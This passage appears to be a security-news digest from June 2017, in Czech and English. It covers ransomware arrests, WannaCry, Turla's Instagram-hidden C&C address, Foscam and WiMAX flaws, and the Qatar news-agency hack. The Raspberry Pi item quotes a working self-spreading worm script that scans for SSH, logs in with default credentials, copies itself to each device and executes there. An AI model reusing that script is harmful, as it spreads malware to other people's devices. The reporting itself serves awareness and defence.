"Encryption is unique," concludes the ICIT paper, "in that it is the only solution that definitely impedes an adversary's ability to exploit exfiltrated data... For the sake of consumers, critical infrastructure, and national security, public and private organizations must at least encrypt their data; even if legislators and regulators have to mandate encryption requirements."

According to Martin, the existing requirements of the Cybersecurity Act of 2015 are not sufficient. "This is unlikely to change without additional legislation," agrees Martin. A combination of FPE and explicit encryption legislation, says the ICIT, is what is needed to restore the public's faith in government agencies' use of personal data.

Za celosvětovým vyděračským virem stál teprve 14letý mladík. Skončil v poutech

8.6.2017 Novinky/Bezpečnost Viry
Pod pojmem hacker si většina lidí pravděpodobně představí nějakého počítačového experta, který po studiích na vysoké škole zběhnul na temnou stranu. Jenže ve skutečnosti mohou hackerské dovednosti ovládat bez nadsázky doslova děti. V Japonsku například kvůli šíření obávaných vyděračských virů zadrželi teprve 14letého mladíka.
Informoval o tom server The Hacker News. V souvislosti s vyděračskými viry, které jsou často označovány souhrnným názvem ransomware, zadrželi hackera v Japonsku vůbec poprvé. Na tom by patrně nebylo nic tak překvapivého, pokud by v poutech neskončil teprve náctiletý mladík.

Zatím žádnému hackerovi, na kterého si došlápla policie, totiž nebylo méně než 15 let.

Pikantní na celé kauze je, že mladík zákeřný škodlivý kód nejen šířil v prostředí internetu, ale zároveň jej skutečně i sám naprogramoval. A to není tak snadné, jak by se mohlo na první pohled zdát. Jeho znalost programování tak musela být na poměrně slušné úrovni.

Toužil po penězích a slávě
Motivace k takovému činu byla u japonského hackera jasná. Toužil po penězích, neboť od svých obětí požadoval za odemčení počítače a zpřístupnění dat i zaplacení výkupného.

Nakonec mu ale jeho úspěch stoupl tak do hlavy tak, že se na sociálních sítích začal chlubit, jak je úspěšný – kolik počítačů zaviroval a kolik peněz díky tomu vydělal. Aby všem dokázal, že za vyděračským virem stojí skutečně on, dokonce na internet nahrál i jeho zdrojový kód.

Svým neopatrným chováním nakonec všechny důkazy naservíroval ochráncům zákona jak na zlatém podnosu. Ti jej pak obvinili z šíření počítačových virů a infikování více než stovky počítačů.

Jaký trest mladíkovi hrozí, není v tuto chvíli jasné. Policie se totiž k případu nechce s ohledem na velmi nízký věk hackera vůbec vyjadřovat.

Strašák jménem WannaCry
Jak nebezpečné dokážou vyděračské viry být, ukázal minulý měsíc rozsáhlý útok škodlivého programu WannaCry. Vir, který zašifruje soubory na počítači a bez zaplacení výkupného je neuvolní, infikoval odhadem na 300 000 počítačů ve 150 zemích světa.

Je však nutné zdůraznit, že ani po zaplacení výkupného uživatelé nemají jistotu, že se k datům dostanou.

Vyděračské viry AES-NI a XData už neděsí. Bezpečnostní experti mají lék

8.6.2017 Novinky/Bezpečnost Viry
Hned na dva vyděračské viry vyzráli bezpečnostní experti. Hrozbu pro uživatele tak již škodlivé kódy AES-NI a XData nepředstavují, neboť odborníci z antivirové společnosti Eset vytvořili nástroj, pomocí kterého je možné tyto záškodníky ze systému vyhnat a uzamčená data zpřístupnit i bez placení výkupného.
Bezpečnostním expertům pomohli anonymní uživatelé, kteří zveřejnili na jednom diskuzním fóru zabývajícím se pomocí obětem vyděračských virů kódy, pomocí nichž je možné data odšifrovat.

Právě s jejich pomocí byl pak vytvořen dešifrovací nástroj. „Ten funguje na soubory zašifrované klíčem RSA, který používá verze ransomware AES-NI B, jež přidává k napadeným souborům přípony .aes256, .aes_ni a .aes_ni_0day, a také na data zašifrovaná ransomwarem ve verzi XData,“ přiblížil technickou stránku věci Pavel Matějíček, manažer technické podpory společnosti Eset.

Stahovat dešifrovací nástroj je možné zdarma na stránkách tvůrců.

Zašifrují data, chtějí výkupné
Na napadeném stroji dokážou oba vyděračské viry udělat pěkný nepořádek. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.

Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.

Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.

Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné.

WannaCry pro Windows 10? Potenciálně ano, ale jen pro starší verzi 1511

8.6.2017 CNEWS.cz Viry
Bezpečnostní firma naportovala exploit, jenž využívá WannaCry, na Windows 10. Ukazuje se, že nové verze Windows jsou skutečně bezpečnější.

Vzpomenete si ještě na WannaCry? Tento ransomware začal zhruba v polovině válcovat organizace po celém světě a ukázal, že nejsou dodržovány základy bezpečného chování v kybernetickém prostoru. V podstatě napadal jen počítačů s Windows 7. Ikspéček v tomto ohledu byla nezajímavá, v případě Desítek pro změnu Microsoft tvrdil, že je tento systém vůči ransomwaru imunní.

To vedle ke spekulacím, proč tomu tak je. Kolega Lukáš Václavík se v podcastu zamyslel nad tím, jestli to není dané povinností instalovat servisní aktualizace. Nebo se systému díra vůbec nenacházela? Nebo se v něm nacházela, ale jiné ochranné mechanismy neumožnily její zneužití? Protože příslušná záplata vyšla i pro Windows 10, měl minimálně z části pravdu Lukáš. Nedokáži ověřit, zda by WannaCry dokázal proniknout do Desítek bez záplaty.

Komentář: Vyhýbáte se aktualizacím? Jste nezodpovědní a ohrožujete společnost

Ten, kdo WannaCry vypustil, k průnikům do počítačů využil exploit EternalBlue, jenž vytvořila NSA. (V poslední době uniká rovněž řada hackovacích materiálů vytvořených CIA. Známé jsou pod souhrnným označením Vault 7.) Bezpečnostní firma RiskSense zveřejnila analýzu tohoto exploitu a co víc, EternalBlue naportovala na Windows 10. Netřeba se děsit k smrti, protože se nejedná o crackery, kteří by měli zájem exploit co nejrychleji vypustit do veřejného prostoru a začít zneužívat.

RiskSense se zaměřil na Windows 10 v1511 v 64bitové edici. Především ale použil systém bez výše odkázané záplaty, která je od března k dispozici. Report uvádí, že pro Windows XP, Vista a 7 neexistují účinná opatření proti zneužití díře – v tomto případě je jediné účinné řešení instalace záplaty. Pro Desítky pak platí, že díky dodatečným prvkům zabezpečení tento systém nelze zneužít tak snadno.

Poslední verze Windows 10, kterou lze zneužít, je právě 1511. (Najdete ji jen na 4,6 % počítačů s Windows 10; verzi 1507 pak na 1,6 %.) Stroje s Windows 10 v1607 jsou schopné zneužiti díry zabránit díky prvku náhodnosti přidaného do položek tabulky stránek. Bez něj bylo možné překonat funkci DEP. Pro Windows 10 v1703 navíc platí, že přidává prvek náhodnosti v souvislosti s hardwarovou abstraktní vrstvou (příslušná knihovna je jednou z prvních, která se při bootování nahrává do paměti).

Jednoduše řečeno je tak zabráněno dalším možnostem, jak do systému proniknout. Report tak potvrdil, že to nebyly plané řeči, když Microsoft řekl, že Desítky nelze napadnout. Jsou bezpečnější jednak díky tomu, že měl každý nainstalovanou záplatu, jednak je samotný systém skutečně lépe zabezpečený díky novým ochranným prvkům. Pokud vás otázky ze druhého odstavce trápily, můžete teď v klidu spát. Eventuálně si přečtěte celý report, který je ovšem poměrně obsáhlý.

Heslo do Facebooku můžete zadat špatně a přesto se přihlásíte

8.6.2017 Živě.cz Sociální sítě

Heslo do Facebooku můžete zadat špatně a přesto se přihlásíte
K přihlašování na Facebook nemusíte přesně zadat svoje heslo a stejně se přihlásíte. Na zajímavost upozornil jeden z dotazů v naší poradně, a tak jsme věc ověřili. A skutečně, heslo ke svému účtu opravdu nemusíte zadat zcela korektně a Facebook ho bude akceptovat. Nejedná se však o bezpečnostní „díru“, jak by se mohlo zdát.

Nedešifroval svůj disk, a tak skončil ve vězení. Už tam sedí 16 měsíců a pořád nechce sdělit heslo
Abyste se do Facebooku mohli přihlásit, heslo k účtu znát musíte. Facebook však toleruje nejčastější chyby v zápisu. Konkrétně tyto:

velké počáteční písmeno, i když heslo začíná malým písmenem
přehozená velikost písmen napříč celým heslem
znak navíc za heslem
První výjimka vznikla kvůli mobilním telefonům, které jsou většinou vybaveny funkcí zápisu prvního velkého písmena na začátku vět. Druhá je pak odpovědí na omylem zapnutý CapsLock. Ve třetím případě jde zřejmě o eliminaci chyby vloženého znaku navíc. To se stává při kopírování hesla odjinud, zpravidla se do zápisu vloudí mezera. Na některých zařízeních se rovněž může stát, že bude do hesla odeslán i znak zastupující potvrzovací klávesu.

Vyzkoušeli jsme si slovníkový útok na Wi-Fi router. Provařená hesla odhalí za okamžik
Jedná se zjevně o nejčastější chyby při zápisu hesla. Pokud nedojde k jeho akceptaci napoprvé, odešle přihlašovací formulář ještě verzi s prvním malým písmenem, přehozenou velikostí písmen a bez jednoho znaku na konci. Vše je samozřejmě šifrované a porovnává se jen zašifrovaný otisk hesla uložený v databázi.

Zabezpečení tímto tedy nijak zvlášť neutrpí. Jen čistě teoreticky, když by vám někdo hádal heslo hrubou silou, bude mít o pár pokusů méně. V celkovém množství možností by to ale bylo stejně naprosto zanedbatelné.

Hackeři našli netradiční způsob maskování. Adresu svého serveru ukryli na Instagram Britney Spears
8.6.2017 Živě.cz APT
Ruská hackerská skupina se zaměřuje na významné osobnosti
Backdoor byl instalován jako doplněk do prohlížeče Firefox
Adresa serveru byla uložena jako komentář na Instagramu
Bezpečnostní odborníci Esetu objevili trojského koně, jenž se maskuje za doplněk do prohlížeče Firefox a má a za úkol útočníkům odesílat informace o aktivitě oběti. Podle zprávy, kterou vydali a svém blogu, jde o dílo ruské hackerské skupiny Turla, která se často zaměřuje na státní představitele nebo celebrity. Nejzajímavějším na tomto případě je způsob, jakým hackeři maskují adresu řídícího serveru, s nímž malware komunikuje.

Backdoor v doplňku

Útočníci využili napadaný web jedné ze švýcarských bezpečnostních společností, takže pokud ji navštívil uživatel s prohlížečem Firefox, bylo mu nabídnuto stažení doplňku s názvem HTML5 Encoding. Pro méně znalého uživatele se může addon jevit jako součást, která pomůže ke korektnímu zobrazení stránky. Ve skutečnosti však začne po instalaci prohlížeč odesílat uživatelská data na server útočníků. Ostatně vše je postaveno na javascriptovém backdooru, který se objevil před necelým rokem v podobě infikovaného dokumentu pro Word a rovněž instaloval totožný doplněk do Firefoxu.

Wikileaks zveřejnil detaily další kyberzbraně CIA. Jmenuje se Pandemic a mohla na přání zasáhnout celé podniky
Zajímavostí je, že skupina Turla použila tento nástroj v roce 2016 pro napadení rumunských institucí.

V hlavní roli Britney Spears

Backdoor v doplňku pro webový prohlížeč by nebyl nijak zajímavý a takto distribuovaný malware je běžným postupem útočníků. V tomto případě si ale zaslouží pozornost díky způsobu, jakým je zajištěno zamaskování adresy řídícího serveru, z něhož putují pokyny pro instalované instance malwaru a zároveň jsou na něj odesílány získaná uživatelská data.

Šíří se podvodná kampaň lákající na slevy v supermarketech. Neklikejte na ni
Útočníci adresu v prvním kroku ukryli pomocí nejrozšířenějšího zkracovače adres Bit.ly, který vždy vygeneruje adresu ve formátu bit.ly/xxxxxxx. A právě unikátních sedm znaků, které jsou součástí každé URL, ukryli útočníci do komentáře na sociální síti Instagram.

Konkrétně v tomto případě to byla fotka Britney Spears, kterou okomentoval uživatel s nickem asmith2155. Na první pohled není komentář ničím zajímavý a nikoho nemůže napadnout, že má nějaký další účel.

Klepněte pro větší obrázek
Komentář skrývá vše potřebné pro získání adresy serveru (zdroj: Eset)

Pokud byste ale text komentáře zkopírovali a vložili do textového editoru, zjistíte, že před některými písmeny a číslicemi se nachází Unicode znak \200d. Ten se používá primárně při práci v emoji a při standardním zobrazení není viditelný. V tomhle případě ale označuje právě znaky tvořící onu zkrácenou adresu na bit.ly:

smith2155< 200d >#2hot ma< 200d >ke lovei< 200d >d to < 200d >her, < 200d >uupss < 200d >#Hot < 200d >#X

Pokud tedy poskládáte vše, co je za zástupným \200d, dostanete adresu bit.ly/2kdhuHX. Pod tou se ukrývala standardní adresa serveru a skriptu, který se o komunikaci staral.

Pokud útočníci budou chtít změnit server, mohou komentář na sociální síti smazat a nahradit jej jiným, který povede na aktualizovaný zkrácený odkaz s adresou nového serveru.

Critical Flaw Exposes Many WiMAX Routers to Attacks

8.6.2017 securityweek Vulnerebility
Researchers have discovered a critical authentication bypass vulnerability that exposes many WiMAX routers to remote attacks, and there is no indication that affected vendors will release patches any time soon.

WiMAX (Worldwide Interoperability for Microwave Access) is a wireless communications standard that is similar to LTE. The technology is present in many networking devices, including ones that are directly accessible from the Internet.

Researchers at SEC Consult noticed that several WiMAX gateways are affected by a serious flaw that can be exploited by a remote, unauthenticated attacker to change the device’s administrator password by sending it a specially crafted request. The weakness is tracked as CVE-2017-3216.

Once they change the device’s admin password, attackers can access its web interface and conduct various actions, including change the router’s DNS servers for banking and ad fraud, upload malicious firmware, or launch further attacks on the local network or the Internet.Vulnerable ZyXEL gateway

SEC Consult believes the vulnerability is present in several gateways from GreenPacket, Huawei, MADA, ZTE and ZyXEL. It appears the firmware of all affected devices has been developed with a software development kit (SDK) from MediaTek, a Taiwan-based company that provides system-on-a-chip (SoC) solutions for wireless communications.

Experts believe ZyXEL and its sister company MitraStar used the MediaTek SDK to develop firmware for routers that it has sold to ISPs and companies such as GreenPacket, Huawei and ZTE. However, MediaTek claims the vulnerability found by SEC Consult does not affect its SDK, which suggests that the flaw may have been introduced with code added by ZyXEL.

ZyXEL has been notified by CERT/CC, which has also published an advisory, but the company has not provided any information.

Huawei has confirmed that some of its products are affected by the vulnerability, but they will not receive any patches as they reached end-of-service in 2014. The company has published a security notice advising customers to replace their old routers.

An analysis by SEC Consult showed that there are between 50,000 and 100,000 vulnerable devices accessible directly from the Internet. The company has published an advisory that contains the exact device models impacted by the security hole.

Since patches are unlikely to become available any time soon, users have been advised to either replace the devices or take measures to prevent remote access, such as restricting access to only trusted clients and disabling remote device management features.

"Platinum" Cyberspies Abuse Intel AMT to Evade Detection

8.6.2017 securityweek CyberSpy
The cyber-espionage group tracked by Microsoft as “Platinum” has started abusing a component of Intel’s Active Management Technology (AMT) in attacks aimed at organizations in Southeast Asia.

The activities of the Platinum group, which has been active since at least 2009, were exposed just over one year ago by Microsoft. At the time, it had been leveraging a Windows feature called hotpatching in attacks targeting government organizations, intelligence agencies, defense institutes and ISPs in South and Southeast Asia.

Researchers reported at the time that the information stolen by the advanced persistent threat (APT) actor had been used for indirect economic advantages, not direct financial gain.

Microsoft noticed recently that a file transfer tool used by the group had started leveraging Intel AMT’s Serial-over-LAN (SOL) feature.

Previous versions of the tool used regular network APIs to communicate over TCP/IP. A more recent version of the tool started using the AMT SOL feature, most likely in an effort to increase its chances of evading detection.

Intel’s AMT, which is part of the vPro technology offering, allows users to remotely manage a system regardless of its power state and the presence or absence of an operating system. The SOL feature also works all the time, even without the OS, and it provides a virtual serial port. A management console can connect to this port, boot to a basic DOS system, and communicate with software that listens on a designated COM port.

Since SOL works independently of the operating system, communications are not picked up by firewalls and network monitoring applications running on the device.

This makes Platinum’s file transfer tool stealthy and allows it to evade some security products. However, Microsoft pointed out that its Windows Defender Advanced Threat Protection product can identify malicious usage of the SOL feature.

Microsoft has been working with Intel to analyze the file transfer tool and determined that the attackers have not exploited any AMT vulnerabilities, and instead they misused the technology after gaining administrative access to targeted systems.

In order to abuse the SOL feature, an attacker would have to obtain existing credentials if AMT was already provisioned, or they can enable AMT themselves, which allows them to set their own username and password for the SOL session.

While in this case the attackers have not exploited any AMT vulnerabilities, the technology has been known to contain security holes. Intel recently issued a critical alert to warn users of a privilege escalation flaw that had existed for more than nine years.

Chinese Apple Staff Suspected of Selling Private Data

8.6.2017 securityweek Apple
Beijing - Chinese authorities say they have uncovered a massive underground operation run by Apple employees selling computer and phone users' personal data.

Twenty-two people have been detained on suspicion of infringing individuals' privacy and illegally obtaining their digital personal information, according to a statement Wednesday from local police in southern Zhejiang province.

Of the 22 suspects, 20 were Apple employees who allegedly used the company's internal computer system to gather users' names, phone numbers, Apple IDs, and other data, which they sold as part of a scam worth more than 50 million yuan ($7.36 million).

The statement did not specify whether the data belonged to Chinese or foreign Apple customers.

Following months of investigation, the statement said, police across more than four provinces -- Guangdong, Jiangsu, Zhejiang, and Fujian -- apprehended the suspects over the weekend, seizing their "criminal tools" and dismantling their online network.

The suspects, who worked in direct marketing and outsourcing for Apple in China, allegedly charged between 10 yuan ($1.50) and 180 yuan ($26.50) for pieces of the illegally extracted data.

The sale of personal information is common in China, which implemented on June 1 a controversial new cybersecurity law aimed at protecting the country's networks and private user information.

In December, an investigation by the Southern Metropolis Daily newspaper exposed a black market for private data gathered from police and government databases.

Reporters successfully obtained a trove of material on one colleague -- including flight history, hotel checkouts and property holdings -- in exchange for a payment of 700 yuan ($100).

A new Linux Malware targets Raspberry Pi devices to mine Cryptocurrency
8.6.2017 securityaffairs Virus

Security researchers at Dr. Web discovered two new Linux Malware, one of them mines for cryptocurrency using Raspberry Pi Devices.
Malware researchers at the Russian antivirus maker Dr.Web have discovered a new Linux trojan, tracked as Kinux.MulDrop.14, that is infecting Raspberry Pi devices with the purpose of mining cryptocurrency.

According to the Russian antivirus maker Dr.Web, the malware was first spotted online in May, the researchers discovered a script containing a compressed and encrypted application.

The Kinux.MulDrop.14 malware targets unsecured Raspberry Pi devices that have SSH ports open to external connections.

Once the Linux malware infects the device, it will first change the password for the “pi” account to:

\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1
then the malware shuts down several processes and installs libraries like ZMap and sshpass that it uses for its operations.

“Linux Trojan that is a bash script containing a mining program, which is compressed with gzip and encrypted with base64. Once launched, the script shuts down several processes and installs libraries required for its operation. It also installs zmap and sshpass.” states the analysis published by Dr Web.

“It changes the password of the user “pi” to “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1””

The malware then starts a cryptocurrency mining process and uses ZMap to scan the Internet for other devices to infect.

Every time the Linux malware finds a Raspberry Pi device on the Internet it uses sshpass to attempt to log in using the default username “pi” and the password “raspberry.”

The malicious code only attempts to use this couple of values, this suggests the malware only targets Raspberry Pi devices. Experts believe the malware could be improved and could be used in the next weeks to targets other platforms.

Below a portion of code shared by Dr.Web

NAME=`mktemp -u 'XXXXXXXX'`
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 10
done
Researchers at Dr. Web also analyzed a second Linux malware Linux.ProxyM that was used to create a proxy network.

The malicious code starts a SOCKS proxy server on infected devices used to relay malicious traffic, disguising his real source.

“The other Trojan was named Linux.ProxyM. attacks involving this Trojan have been noted since February 2017 but peaked in late May. The below chart shows how many Linux.ProxyM attacks Doctor Web specialists have pinpointed:” states Dr. Web.

Linux malware proxym_en.2

According to Dr. Web, the number of devices infected with Linux.ProxyM has reached 10,000 units since its discovery in February 2017.

Turla APT malware now retrieves C&C address from Instagram comments
8.6.2017 securityaffairs APT

A malicious code used by Turla APT in a recent campaign leverages comments posted to Instagram to obtain the address of the command and control servers.
Malware researchers at security firm ESET have spotted a new piece of malware used by Turla APT in cyber attacks. The malicious code leverages comments posted to Instagram to obtain the address of its command and control (C&C) servers.

Turla APT is considered a group of hackers linked to the Russian Government, it is also known as Waterbug, KRYPTON and Venomous Bear.

The APT have been active since at least 2007, it was involved in several high-profile attacks against targets worldwide, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command.

Last time experts analyzed the threat actor was March 2017 when ESET firm reported that it was continuing to improve its Carbon backdoor, the malware researchers detected new versions released on a regular basis. The group is still active and it is developing new hacking tools and empowering the existing ones.

At the annual Kaspersky Lab conference, researcher Thomas Rid along security experts Costin Raiu and Juan Andres Guerrero-Saade presented the findings of its research that definitively connect the Moonlight Maze cyber espionage campaigns to the Russian APT group.

Turla APT recently targeted the websites of ministries, embassies and other organizations worldwide, in its last campaign hackers leverage social media to control their malware.

The APT has powered watering hole attacks compromising websites that are likely to be visited by targets of interest, the cyber spies injected malicious code on the websites in an effort to redirect their visitors to a server that delivered a JavaScript tool designed for track a profile of the victim’s machine.

In one case, hackers used a Firefox extension that worked as a backdoor, something similar was spotted by malware researchers at Bitdefender while analyzing the Pacifier Operation.

“Through our monitoring of these watering hole campaigns, we happened upon a very interesting sample. Some of you may remember the Pacifier APT report by BitDefender describing a spearphishing campaign with a malicious Microsoft Word document sent to several institutions worldwide. These malicious documents would then drop a backdoor. We now know that this report describes Skipper, a first stage backdoor used by the Turla gang.” reads the analysis published by ESET. “That report also contains a description of a Firefox extension dropped by the same type of malicious document. It turns out we have found what most likely is an update of this Firefox extension. It is a JavaScript backdoor, different in terms of implementation to the one described in the Pacifier APT report, but with similar functionalities.”

The Firefox extension used in this last campaign was spread through the website of a Swiss security company’s website. The backdoor gathers information on the infected system, and it allows attackers to perform ordinary spyware actions.

The peculiarity of the backdoor is the way it obtains the address of its C&C server, it looks at a specific comment posted to a photo on Britney Spears’ Instagram account.

The comment reads

“#2hot make loved to her, uupss #Hot #X,”

Turla APT instagram

Parsing the comment with a regular expression it is possible to obtain a bit.ly URL that represents the backdoor’s C&C server.

The extension determines the comment to parse by computing a custom hash value that must match 183.

“The extension will look at each photo’s comment and will compute a custom hash value. If the hash matches 183, it will then run this regular expression on the comment in order to obtain the path of the bit.ly URL:

(?:\\u200d(?:#|@)(\\w)” continues the analysis.

Parsing the comment through the regex experts got the following bit.ly URL:

http://bit[.]ly/2kdhuHX

“Looking a bit more closely at the regular expression, we see it is looking for either @|# or the Unicode character \200d. This character is actually a non-printable character called ‘Zero Width Joiner’, normally used to separate emojis. Pasting the actual comment or looking at its source, you can see that this character precedes each character that makes the path of the bit.ly URL:

smith2155<200d>#2hot ma<200d>ke lovei<200d>d to <200d>her, <200d>uupss <200d>#Hot <200d>#X

When resolving this shortened link, it leads to static[.]travelclothes.org/dolR_1ert.php , which was used in the past as a watering hole C&C by the Turla crew.” states ESET.

Experts noticed that this above bit.ly URL was only accessed 17 times, which could indicate that hackers were testing the technique.

Researchers also highlighted that some of the APIs used by the malicious extension will no longer work in future Firefox releases, for this reason, upcoming versions of the backdoor will have to be implemented differently.

Hard-coded Passwords Make Hacking Foscam ‘IP Cameras’ Much Easier
8.6.2017 thehackernews Hacking
Security researchers have discovered over a dozen of vulnerabilities in tens of thousands of web-connected cameras that can not be protected just by changing their default credentials.
Vulnerabilities found in two models of IP cameras from China-based manufacturer Foscam allow attackers to take over the camera, view video feeds, and, in some cases, even gain access to other devices connected to a local network.
Researchers at security firm F-Secure discovered 18 vulnerabilities in two camera models — one sold under the Foscam C2 and other under Opticam i5 HD brand — that are still unpatched despite the company was informed several months ago.
In addition to the Foscam and Opticam brands, F-Secure also said the vulnerabilities were likely to exist in 14 other brands that use Foscam internals, including Chacon, 7links, Netis, Turbox, Thomson, Novodio, Nexxt, Ambientcam, Technaxx, Qcam, Ivue, Ebode and Sab.
The flaws discovered in the IP cameras includes:
Insecure default credentials
Hard-coded credentials
Hidden and undocumented Telnet functionality
Remote Command Injections
Incorrect permissions assigned to programming scripts
Firewall leaking details about the validity of credentials
Persistent cross-site scripting
Stack-based Buffer overflow attack
Changing Default Credentials Won't Help You

Usually, users are always advised to change the default credentials on their smart devices, but in this case, Foscan is using hard-coded credentials in cameras, so attackers could bypass passwords even if users set a unique one.
"Credentials that have been hard-coded by the manufacturer cannot be changed by the user. If the password is discovered and published on the internet (which often happens) attackers can gain access to the device. And as all devices have the same password, malware attacks such as worms can easily spread between devices," reads a report [PDF] released Wednesday by F-Secure.
These issues could allow an attacker to perform a wide range of attacks, which includes gaining unauthorized access to a camera, accessing private videos, performing remote command injection attacks, using compromised IP cameras for DDoS or other malicious activities, and compromising other devices in the same network.
Hidden and undocumented Telnet functionality could help attackers use Telnet to discover "additional vulnerabilities in the device and within the surrounding network."
Gaining Persistent Remote Access to the Affected Camera
Three vulnerabilities, including built-in file transfer protocol server that contains an empty password that can't be changed by the user, a hidden telnet function and incorrect permissions assigned to programming scripts, could be exploited by attackers to gain persistent remote access to the device.
"The empty password on the FTP user account can be used to log in. The hidden Telnet functionality can then be activated. After this, the attacker can access the world-writable (non-restricted) file that controls which programs run on boot, and the attacker may add his own to the list," F-Secure researchers says.
"This allows the attacker persistent access, even if the device is rebooted. In fact, the attack requires the device to be rebooted, but there is a way to force a reboot as well."
No Patch Despite being Alerted Several Months Ago
The security firm said it notified of the vulnerabilities to Foscam several months ago, but received no response. Since the security camera maker has not fixed any of the vulnerabilities to date, F-Secure has not released proof-of-concept (PoC) exploits for them.
According to F-Secure, these type of insecure implementation of devices and ignorance of security allowed the Mirai malware to infect hundreds of thousands of vulnerable IoT devices to cause vast internet outage last year by launching massive DDoS attacks against Dyn DNS provider.
In order to protect yourself, you need to be more vigilant about the security of your Internet-of-Thing (IoT) devices because they are dumber than one can ever be.
Researchers advised users who are running one of these devices to strongly consider running the device inside a dedicated local network that's unable to be reached from the outside Internet and isolate from other connected devices.
As a best practice, if you've got any internet-connected device at home or work, change its credentials if it still uses default ones. But changing default passwords won't help you in this case, because Foscam IP cameras are using hard-coded credentials.

US intelligence officials believe Russian Hackers are behind the Qatar hack
8.6.2017 securityaffairs BigBrothers
US intelligence officials believe Russi-linked hackers are behind the Qatar hack and used false news to prompt a diplomatic crisis in the Gulf area.
Russian hackers have planted false story news raised the crisis in the Gulf among Qatar and other states, including Saudi Arabia, the United Arab Emirates, Egypt and Bahrain that cut ties to the country.

According to the US security agencies, Russian hackers were behind the intrusion reported by the Qatari government two weeks ago,

“The alleged involvement of Russian hackers intensifies concerns by US intelligence and law enforcement agencies that Russia continues to try some of the same cyber-hacking measures on US allies that intelligence agencies believe it used to meddle in the 2016 elections.” states the CNN.
The Gulf States accuses Qatar of supporting extremist groups, but the Qatari government denied any allegations.

Qatar asked for a help to US, a team of FBI experts went in the country in late May to find evidence of the attack and determine the author.

“Sheikh Saif Bin Ahmed Al-Thani, director of the Qatari Government Communications Office, confirmed that Qatar’s Ministry of Interior is working with the FBI and the United Kingdom’s National Crime Agency on the ongoing hacking investigation of the Qatar News Agency.” reported the CNN.

The crisis escalated after the so-called Qatar hack, cyber attacks hit the the Qatar’s state-run news agency. Qatar faced an unprecedented security breach, unknown attackers posted fake news stories attributed to its ruler on highly sensitive regional political issues.

Qatar hack - news agency hacked

The hackers hit the Qatar official news agency website and Twitter account causing serious problems to the country.

Hackers shared fake content supposedly addressed by Emir Sheikh Tamim bin Hamad Al-Thani, including the Palestinian-Israeli conflict, tensions with the Trump’s administration, strategic relations with Iran, and comments about Hamas.

“The Qatar News Agency website has been hacked by an unknown entity,” reported the Communications Office in a statement.

“A false statement attributed to His Highness has been published.”

Hackers also published on the hijacked Twitter account a fake story in Arabic apparently from the country’s foreign minister, Mohammed bin Abdulrahman Al-Thani, about Qatar withdrawing its ambassadors from several countries in other East Gulf states.

Qatari Foreign Minister Sheikh Mohammed Bin Abdulrahman al-Thani told CNN that the FBI experts confirmed the hack and the spreading of fake news via the hacker social media account.

“Whatever has been thrown as an accusation is all based on misinformation and we think that the entire crisis being based on misinformation,” he told CNN.

“Because it was started based on fabricated news, being wedged and being inserted in our national news agency which was hacked and proved by the FBI”

“The Ministry of Interior will reveal the findings of the investigation when completed,” he told CNN.
Despite Qatar is considered a good ally for the US due to its support to US military in the area, Trump do not exclude that state was funding extremism.

In the following tweet, Trump expressed its approval for the regional blockade in the effort of stopping terrorist funding.
Follow
Donald J. Trump ✔ @realDonaldTrump
So good to see the Saudi Arabia visit with the King and 50 countries already paying off. They said they would take a hard line on funding...
3:36 PM - 6 Jun 2017
40,643 40,643 Retweets 62,330 62,330 likes
Twitter Ads info and privacy
After Trump’s tweets, the US State Department announced that Qatar had made significant progress on stemming the funding of terrorists but that there was more to do.

Multiple Vulnerabilities Found in Popular IP Cameras

8.6.2017 securityweek Vulnerebility
Multiple vulnerabilities have been found in China's Foscam-made IP cameras. The vulnerabilities were reported to the manufacturer several months ago, but no fixes have been made available. Foscam cameras are sold under different brand names, such as OptiCam. Users are advised to check on the manufacture of any IP cameras, and if necessary, take their own mitigation steps.

The vulnerabilities, 18 in all, were discovered by F-Secure, who specifically found them in the Opticam i5 and Foscam C2 cameras. F-Secure warns, however, that these vulnerabilities will likely exist throughout the Foscam range and potentially in all 14 separate brand names that it knows to sell Foscam cameras.

The flaws include insecure default credentials, hard-coded credentials, hidden and undocumented Telnet functionality, command injection flaws, missing authorization, improper access control, cross-site scripting, and a buffer overflow. All are detailed in a report (PDF) published today.

"Security has been ignored in the design of these products," said Janne Kauhanen, cyber security expert at F-Secure. "The developers' main concern is to get them working and ship them. This lack of attention to security puts users and their networks at risk. The irony is that this device is marketed as a way of making the physical environment more secure -- however, it makes the virtual environment less so."

While attention on IoT device security -- especially cameras -- has been focused by the Mirai botnet and the largest DDoS attack against the internet infrastructure in history, the quantity and severity of the Foscam vulnerabilities is particularly concerning. "These vulnerabilities are as bad as it gets," commented Harry Sintonen, the F-Secure senior security consultant who found the vulnerabilities. "They allow an attacker to pretty much do whatever he wants. An attacker can exploit them one by one, or mix and match to get greater degrees of privilege inside the device and the network."

